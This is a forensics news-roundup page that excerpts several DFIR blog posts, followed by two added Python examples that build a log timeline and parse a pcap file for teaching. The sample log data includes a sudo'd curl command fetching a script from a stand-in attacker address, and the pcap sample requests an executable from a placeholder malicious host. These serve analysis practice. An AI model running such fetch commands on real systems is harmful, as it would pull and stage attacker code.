Analysis Notes

A place to note things from malware analysis and anything that seemed useful for analysis. This site uses Google Analytics.

4n6 Week 41 – 2023 - FORENSIC ANALYSIS

This entry was generated and posted automatically: it shows the opening of each article featured in This Week in 4n6 (FourAndSix = Forensics), so that the articles worth checking can be skimmed quickly. 4n6 itself can be found here.

FORENSIC ANALYSIS

Emi Polito at Amped

Emi Polito, October 3, 2023. Welcome back everyone to our series “Learn and solve it with Amped FIVE“. This week we are going to be clever and use mathematics to remove noise from an image! Don’t fret! We will learn how we can use the graphical representation of image frequency to remove noise. Curious? Read on! Contents: 1. Random Noise and Periodic Noise; 2. What Is the Frequency Domain?; 3. Removing Periodic Noise Using the Fourier Filter; 4. Automating Noise Selections in the Fourier Filter; 5. Conclusi...

Amr Ashraf

16 minute read. On this page: Overview; Linux Directory Layout; the “.” files; Crashes & Dumps; Linux Logs; Software Installation; Login & User Interaction; Forensics Cheat Sheet; Resources. Overview: Linux is a big target, as almost every server is running some sort of Linux. In this blog post I will try to cover as many details as possible, but I will also expect the reader to have some knowledge of using Linux; I will start with simple topics and move towards advanced ones. Some of the content in this post is copi...

DFRWS

DFRWS APAC blog, 04 Oct 2023. Unraveling Digital Mysteries: How AI Copilots can Revolutionize Digital Forensic Investigations. By Christa Miller. By Hans Henseler, Professor of Digital Forensics & E-Discovery, University of Leiden Applied Sciences, and Senior Digital Forensic Scientist at the Netherlands Forensic Institute. In hindsight, 2021 was a significant inflection point in the world of artificial ...

Digital Daniela

10/5/2023, 1 Comment. Hello Everyone! I did a TryHackMe room where I learned how to use Snort! Here is some cool stuff that I learned! 1. Find PID of Packet: In the task, you are asked to find the Process ID (AKA PID) of the 10th packet. I used this command: snort -r snort.log.1640048004 -n 10. The PID is highlighted and is 49313. 2. Find Referrer of the 4th Packet: Using the sudo snort -r snort.log.1640048004 -X -n 10 command you can find this information; scroll down until you reach the 4th packet...

Forensafe

06/10/2023, Friday. When an Android device’s user downloads a file from the internet or receives it via email/messaging apps, the file often ends up stored by default in the Downloads folder on the device. This folder can contain a variety of file types, including documents, images, videos, audio files, and application packages (APK files). Digital Forensics Value of Android Downloads: The Downloads folder on an Android device can serve as a rich source of digital evidence, so examining t...

Howard Oakley at ‘The Eclectic Light Company’

[…]
13. aONe on October 8, 2023 at 4:57 pm: Thanks for the reading 🙌🏻. I miss the days where I didn’t need to filter the console for it to be useful.
14. hoakley on October 8, 2023 at 7:50 pm: Thank you. So do I. Howard.
15. Thomas on October 8, 2023 at 9:21 pm: I am not sure I understand…. clearly syslog on notice level and above makes it into the new logging system. I was trying to debug pureFTP (without changing its implementation) and like ...

InfoSec Write-ups

Gowthamaraj Rajendran (@fuffsec), published in InfoSec Write-ups, 2 min read, Nov 22, 2022. Hi Squad, today I will discuss the usefulness of timeline creation during forensic analysis. Let’s get into it. (Gonna be short and to the point.) Source: //i.ytimg.com/vi/5j2LOZH9_oM/maxresdefault.jpg Introduction: The idea behind timeline analysis is to list out the events that happened in your system in chronological order. This will help you to analyze the events and their consequences. For exam...
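A worked example of the timeline idea above, added here and not code from the InfoSec Write-ups post (it also covers the Linux Logs and Login & User Interaction topics listed in Amr Ashraf's entry): it parses constructed sshd/sudo syslog lines and an Apache access log, normalises every timestamp to UTC, and merges them into one chronological super-timeline that can then be narrowed to a single indicator. The log lines, the year 2023 for the year-less syslog entries, and the host clock offset are assumptions made for the example.

```python
import re
from dataclasses import dataclass
from datetime import datetime, timezone, timedelta

# Constructed sample input (not real logs): an SSH brute force that succeeds,
# a sudo'd curl to the attacker's host, and web hits from the same address.
AUTH_LOG = """\
Oct  5 14:02:11 web01 sshd[2231]: Failed password for root from 203.0.113.7 port 51022 ssh2
Oct  5 14:02:13 web01 sshd[2231]: Failed password for root from 203.0.113.7 port 51022 ssh2
Oct  5 14:02:19 web01 sshd[2240]: Accepted password for deploy from 203.0.113.7 port 51030 ssh2
Oct  5 14:03:40 web01 sudo:   deploy : TTY=pts/0 ; PWD=/home/deploy ; USER=root ; COMMAND=/usr/bin/curl http://203.0.113.7/x.sh
"""
ACCESS_LOG = """\
203.0.113.7 - - [05/Oct/2023:14:01:58 +0000] "GET /wp-login.php HTTP/1.1" 200 1234
203.0.113.7 - - [05/Oct/2023:14:04:02 +0000] "POST /upload HTTP/1.1" 200 88
"""

SYSLOG_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) (?P<host>\S+) "
    r"(?P<proc>[^:\[\s]+)(?:\[(?P<pid>\d+)\])?: (?P<msg>.*)$")
APACHE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3}) \S+$')


@dataclass(frozen=True)
class Event:
    ts: datetime    # always timezone-aware UTC, so events from any source compare
    source: str     # which artifact the record came from
    actor: str      # host name or client IP, whatever identifies the origin
    summary: str


def parse_syslog(text, year, host_tz):
    """Traditional syslog lines carry neither year nor zone: the analyst supplies
    the year and the host's clock zone, and the result is normalised to UTC."""
    events = []
    for line in text.splitlines():
        m = SYSLOG_RE.match(line)
        if not m:
            continue                      # keep going past lines we do not understand
        local = datetime.strptime(m["ts"], "%b %d %H:%M:%S").replace(year=year, tzinfo=host_tz)
        proc = m["proc"] + (f"[{m['pid']}]" if m["pid"] else "")
        events.append(Event(local.astimezone(timezone.utc), "syslog", m["host"],
                            f"{proc}: {m['msg'].strip()}"))
    return events


def parse_apache(text):
    """Combined-format access log: the timestamp carries its own UTC offset."""
    events = []
    for line in text.splitlines():
        m = APACHE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z").astimezone(timezone.utc)
        events.append(Event(ts, "apache", m["ip"], f"{m['req']} -> {m['status']}"))
    return events


def build_timeline(auth_text, access_text, year=2023, host_utc_offset_hours=0):
    """Merge every source into one list sorted by UTC time (then source, for ties)."""
    host_tz = timezone(timedelta(hours=host_utc_offset_hours))
    events = parse_syslog(auth_text, year, host_tz) + parse_apache(access_text)
    return sorted(events, key=lambda e: (e.ts, e.source))


def pivot(events, indicator):
    """Narrow the timeline to events mentioning an indicator (IP, user, path ...)."""
    return [e for e in events if indicator == e.actor or indicator in e.summary]


def render(events):
    return "\n".join(f"{e.ts:%Y-%m-%dT%H:%M:%SZ}  {e.source:<7} {e.actor:<12} {e.summary}"
                     for e in events)


if __name__ == "__main__":
    timeline = build_timeline(AUTH_LOG, ACCESS_LOG)
    print(render(timeline))
    print("--- events involving 203.0.113.7 ---")
    print(render(pivot(timeline, "203.0.113.7")))
```

The point of forcing every source through one timezone-aware representation is visible when the host clock is not UTC: passing host_utc_offset_hours=9 moves the syslog entries nine hours earlier and changes which event comes first, which is exactly the kind of ordering mistake that misattributes cause and effect.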

Creating custom module. Ott3rly, published in InfoSec Write-ups, 5 min read, Oct 1. In order to be successful in bug bounty you have to be a little different from the crowd: use your own or lesser-known tools. In this article, we will learn the intricacies of adding your own tool as an Axiom module. If you are interested in more about Axiom, the basics, installation, and core commands, I do recommend reading the previous parts of the series. What is an Axiom module? Axiom modules are basica...

John Lukach at 4n6ir

by John Lukach. It is not if but when you will need the public IP address from a Lambda execution to correlate against CloudTrail logs during an incident, so as not to be up a creek without a paddle. If the Lambda is not attached to a VPC, please at least capture the public IP address to CloudWatch Logs using a Lambda Extension, for both container and packaged functions, as the preparation will be well worth the extra compute costs for this ephemeral artifact. //github.com/4n6ir/getpublicip La...

Justin De Luna at ‘The DFIR Spot’

Windows Artifacts For Intrusion Analysis: A Treasure Trove of Evidence. During an Incident Response (IR) engagement, I'm often asked what artifacts I look at for analysis. Sure, Event Logs are fantastic, the filesystem? Yep! Awesome! Windows Registry? Fantastic! But there are also other artifacts that are extremely powerful. These are artifacts generated by the Windows OS itself. Keep in mind that these artifacts are specifically designed for forensics purposes, but we can sure as heck use them for ...

Kevin Pagano at Stark 4N6

Posted by Kevin Pagano, October 04, 2023. As a preface, I created a 3-part blog series on TeraCopy logs and parsing them, so you may want to read those first to understand the underlying files and queries. Part 1 | Part 2 | Part 3. I had a case recently where I used SQLECmd (via KAPE) to parse through a collected TeraCopy folder. The only problem is that the user must have used it often, as there were over 50 history database files, which when using t...

Magnet Forensics

When you’re faced with a security incident or supporting an internal investigation, quickly obtaining Remote Endpoint File Lists (a full list of all the files and folders present on an endpoint or custodian’s machine) can help you answer key questions. Specifically, “Was this file still present on the endpoint after the attack?” Or when a client or stakeholder wants to know, “How long will it take to collect and process this case?” These questions can be difficult to answer without a comprehensi...

Amber Schroader at Paraben Corporation

Written by Amber Schroader, October 3, 2023, Forensic Impact. We are in the time of year when our pumpkin spice cravings start crawling to the surface and we see some big releases in the world of mobile firmware. It is a good time to validate and check your tools to see what data you gained and lost with the firmware change. With Apple releasing iOS 17 we looked after the final release from the beta as well as the first patches that always go hand in hand with a release. The first change is tha...

Plainbit

현주연, 6 October 2023, 6 min read. AXIOM supports analysis of a wide range of artifacts, but occasionally there is an artifact it does not support (e.g. programs made in Korea). To analyse artifacts for which no analysis feature is provided yet, AXIOM offers a feature called Custom Artifact. Custom artifacts as seen in AXIOM Process. What is a Custom Artifact: a custom artifact is an XML file or Python script configured to analyse an artifact for which no analysis feature is yet provided. Typically, an XML file parses a DB file with SQL queries and then processes the result, while a Python script parses document files (csv, txt, log, xml, etc.) and then processes them. (Left) example Python file / (right) example XML file. 💡 Custom Artifact: in AXIOM Process, artifacts for which no analysis feature is yet provided ...

Revo4n6

Digital forensics unveiled - blog & news

Salim Salimov

ANALYSING PCAP FILES WITH WIRESHARK - PART 2. Salim Salimov, 7 min read, 4 days ago. Hello everybody, welcome to part 2 of .pcap analysing with Wireshark. Today I will try to answer quiz questions from this website: Malware-Traffic-Analysis.net - Traffic Analysis Exercises, 2022-03-21 -- Traffic analysis exercise - Burnincandle, www.malware-traffic-analysis.net. 1. I have created a folder “Quiz” where I downloaded the zip file and extracted the pcap file in. Chosen the first one on the top, follo...
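An added example, not code from Salim Salimov's or Digital Daniela's posts above: a minimal reader for the classic libpcap file format that does by hand what snort -r ... -n N and Wireshark's packet list do for the exercises in both entries. It parses the global header (both byte orders, microsecond and nanosecond variants), numbers the records, decodes Ethernet/IPv4/TCP/UDP, and pulls a request header such as Referer out of an HTTP payload. The capture is constructed inline (three TCP frames with zeroed checksums), so the addresses, ports and URLs are invented for the example.

```python
import struct
from dataclasses import dataclass


@dataclass(frozen=True)
class Packet:
    index: int      # 1-based, like the "No." column in Wireshark
    ts: float       # capture time, epoch seconds
    src: str
    dst: str
    proto: str
    sport: int
    dport: int
    payload: bytes  # bytes above the transport header


# Magic number -> (struct byte order, divisor for the fractional timestamp field)
_MAGIC = {
    b"\xd4\xc3\xb2\xa1": ("<", 1e6), b"\xa1\xb2\xc3\xd4": (">", 1e6),   # microseconds
    b"\x4d\x3c\xb2\xa1": ("<", 1e9), b"\xa1\xb2\x3c\x4d": (">", 1e9),   # nanoseconds
}


def _ipv4(raw):
    return ".".join(str(b) for b in raw)


def _decode_frame(index, ts, frame):
    """Ethernet II -> IPv4 -> TCP/UDP. Other IP protocols are reported with ports 0."""
    if len(frame) < 34 or struct.unpack("!H", frame[12:14])[0] != 0x0800:
        return None                                   # not IPv4: skipped in this example
    ip = frame[14:]
    ihl, total, proto = (ip[0] & 0x0F) * 4, struct.unpack("!H", ip[2:4])[0], ip[9]
    src, dst = _ipv4(ip[12:16]), _ipv4(ip[16:20])
    l4 = ip[ihl:total]
    if proto == 6 and len(l4) >= 20:                  # TCP: honour the data offset
        sport, dport = struct.unpack("!HH", l4[:4])
        return Packet(index, ts, src, dst, "TCP", sport, dport, l4[(l4[12] >> 4) * 4:])
    if proto == 17 and len(l4) >= 8:                  # UDP: fixed 8-byte header
        sport, dport = struct.unpack("!HH", l4[:4])
        return Packet(index, ts, src, dst, "UDP", sport, dport, l4[8:])
    return Packet(index, ts, src, dst, str(proto), 0, 0, l4)


def read_pcap(data, limit=None):
    """Yield Packet objects from a classic pcap (not pcapng) byte string; limit
    mimics snort -n. Stops quietly at a truncated final record, as Wireshark does."""
    try:
        endian, tsdiv = _MAGIC[data[:4]]
    except KeyError:
        raise ValueError("not a classic pcap file") from None
    linktype = struct.unpack(endian + "HHiIII", data[4:24])[5]
    if linktype != 1:
        raise ValueError(f"unsupported link type {linktype}; Ethernet only")
    off, index = 24, 0
    while off + 16 <= len(data):
        ts_sec, ts_frac, incl_len, _orig_len = struct.unpack(endian + "IIII", data[off:off + 16])
        frame = data[off + 16:off + 16 + incl_len]
        if len(frame) < incl_len:
            break
        off += 16 + incl_len
        index += 1
        if limit is not None and index > limit:
            break
        pkt = _decode_frame(index, ts_sec + ts_frac / tsdiv, frame)
        if pkt is not None:
            yield pkt


def http_header(pkt, name):
    """Case-insensitive lookup of a request header in an HTTP/1.x payload, or None."""
    try:
        head = pkt.payload.decode("ascii").partition("\r\n\r\n")[0]
    except UnicodeDecodeError:
        return None
    for line in head.split("\r\n")[1:]:
        key, _, value = line.partition(":")
        if key.strip().lower() == name.lower():
            return value.strip()
    return None


# --- constructed capture used as sample input (IP/TCP checksums left at zero) ---
def _frame(src, dst, sport, dport, flags, payload=b""):
    eth = bytes.fromhex("001122334455") + bytes.fromhex("66778899aabb") + b"\x08\x00"
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 1, 0, 5 << 4, flags, 65535, 0, 0) + payload
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 1, 0, 64, 6, 0,
                     bytes(int(x) for x in src.split(".")), bytes(int(x) for x in dst.split(".")))
    return eth + ip + tcp


def build_sample_pcap():
    """Little-endian, microsecond pcap: SYN, SYN/ACK, then a PSH/ACK carrying a GET."""
    request = (b"GET /update.exe HTTP/1.1\r\nHost: bad.example\r\n"
               b"Referer: http://lure.example/\r\n\r\n")
    frames = [(0, _frame("10.0.0.5", "192.0.2.80", 40000, 80, 0x02)),
              (120, _frame("192.0.2.80", "10.0.0.5", 80, 40000, 0x12)),
              (400, _frame("10.0.0.5", "192.0.2.80", 40000, 80, 0x18, request))]
    out = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)
    for usec, f in frames:
        out += struct.pack("<IIII", 1700000000, usec, len(f), len(f)) + f
    return out


if __name__ == "__main__":
    capture = build_sample_pcap()
    for p in read_pcap(capture):
        print(f"{p.index:>3} {p.ts:.6f} {p.src}:{p.sport} -> {p.dst}:{p.dport} {p.proto} {len(p.payload)}B")
    third = list(read_pcap(capture, limit=3))[-1]
    print("Referer:", http_header(third, "Referer"))
```

Reading the file this way makes two things explicit that GUI tools hide: the packet number is just the record's position in the file, and a capture cut off mid-record (a crashed sensor, a partial copy) silently loses its last packet rather than failing, so the count reported by a tool is a lower bound.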